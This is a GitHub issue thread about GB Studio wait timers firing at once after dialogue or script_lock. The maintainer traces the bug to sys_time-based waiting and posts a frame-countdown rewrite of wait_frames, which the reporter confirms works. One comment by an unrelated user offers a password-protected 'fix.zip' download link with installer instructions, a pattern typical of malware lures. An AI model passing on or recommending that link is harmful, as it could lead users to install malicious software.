### ISSUE TITLE
Wait timers are not paused by dialogues or script_lock

### ISSUE THREAD

**Issue by Steinbeuge** [chrismaltby/gb-studio#1536]
**Describe the bug**
Wait timers are not paused by dialogue or script_lock

**To Reproduce**
create a new project
add an actor and in Interact add a script_lock, dialogue and script_unlock in that order
add a second actor and in OnUpdate add a wait timer followed by a fire projectile

interact with the dialog actor, wait a moment, then exit the dialog and interact again
do this several times in a row, each time the timer expires while in the dialogue, projectiles bunch up

![image](https://github.com/user-attachments/assets/327bb256-ac05-49a5-b7da-95d8789a1377)

**Expected behavior**
If dialogue doesn't lock wait timers, script_lock probably should? (except for the ones in the thread that locked everything else)

**Platform (please complete the following information):**
Win10 AMD
GB Studio 4.0.2

**Additional context**
I'm unsure if this is intended behaviour, I'm unsure how to pause the game without projectile timers going out of sync
internally wait timers rely on sys_time and not game_time, the function wait_frames in vm.c is difficult to understand
example project supplied
[dialogtimertest.zip](https://github.com/user-attachments/files/16750497/dialogtimertest.zip)

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by chrismaltby** [comment]
I think I see what's happening here.
So the timers ARE being paused but the problem is as soon as it resumes they immediately trigger

Relevant code in the game engine is here
https://github.com/chrismaltby/gb-studio/blob/07a80e2221983ba067d35eb7a2b5a7a11ae6e4c6/appData/src/gb/src/core/vm.c#L123-L128

as you say the timer is based on sys_time

The code is pretty much 
```js
function wait_frames(ctx, first_call, args) { 
   const wait_time = args[0];
    if (first_call) {
        start_sys_time = sys_time; // Store the initial sys time
    }
    if (sys_time - start_sys_time < wait_time ) 
      ctx->waitable = true; // means this thread has a function that's going to keep running
      return false; // The function hasn't finished yet
    } else {
      return true; // The timer is finished and script can continue
    }
}
```
so as soon as the timer resumes there will be a big difference between `start_sys_time` and `sys_time` so the timer would immediately fire.

Changing the function to be
```c
UBYTE wait_frames(void * THIS, UBYTE start, UWORD * stack_frame) OLDCALL BANKED {
    // we allocate one local variable (just write ahead of VM stack pointer, we have no interrupts, our local variables won't get spoiled)
    if (start) *((SCRIPT_CTX *)THIS)->stack_ptr = stack_frame[0] + 1; // Store the number of frames to wait
    // check wait condition
    return ((--*((SCRIPT_CTX *)THIS)->stack_ptr) != 0) ? ((SCRIPT_CTX *)THIS)->waitable = TRUE, (UBYTE)FALSE : (UBYTE)TRUE;
}
```

which instead is closer to:
```js
function wait_frames(ctx, first_call, args) { 
   const wait_time = args[0];
    if (first_call) {
        number_of_frames_left = wait_time + 1; // Add 1 as we're going to decrement value on the next line
    }
    number_of_frames_left--;
    if (number_of_frames_left != 0) 
      ctx->waitable = true; // means this thread has a function that's going to keep running
      return false; // The function hasn't finished yet
    } else {
      return true; // The timer is finished and script can continue
    }
}
```

does make your project act more like you expected.

@untoxa what do you think?

**Comment by chrismaltby** [comment]
@Steinbeuge another (admittedly not great) solution would be to manually create a wait script something like this: 
<img width="455" alt="Screenshot 2024-08-29 at 12 48 00" src="https://github.com/user-attachments/assets/f86e9cb8-0c4d-4376-85c2-59662f955bb3">
that would pause as expected also without needing to modify the game engine but wastes one variable for the counter

**Comment by Steinbeuge** [comment]
> does make your project act more like you expected.

Yes! that works as expected, pausing or dialog no longer changes projectile timing, I was hesitant to submit this as a bug in case someone relies on this behaviour. But I also couldn't think of a case where you would need it.

Thanks 🥂

**Comment by chrismaltby** [comment]
Forgot to close this but the issue was fixed in the 4.1.0 release
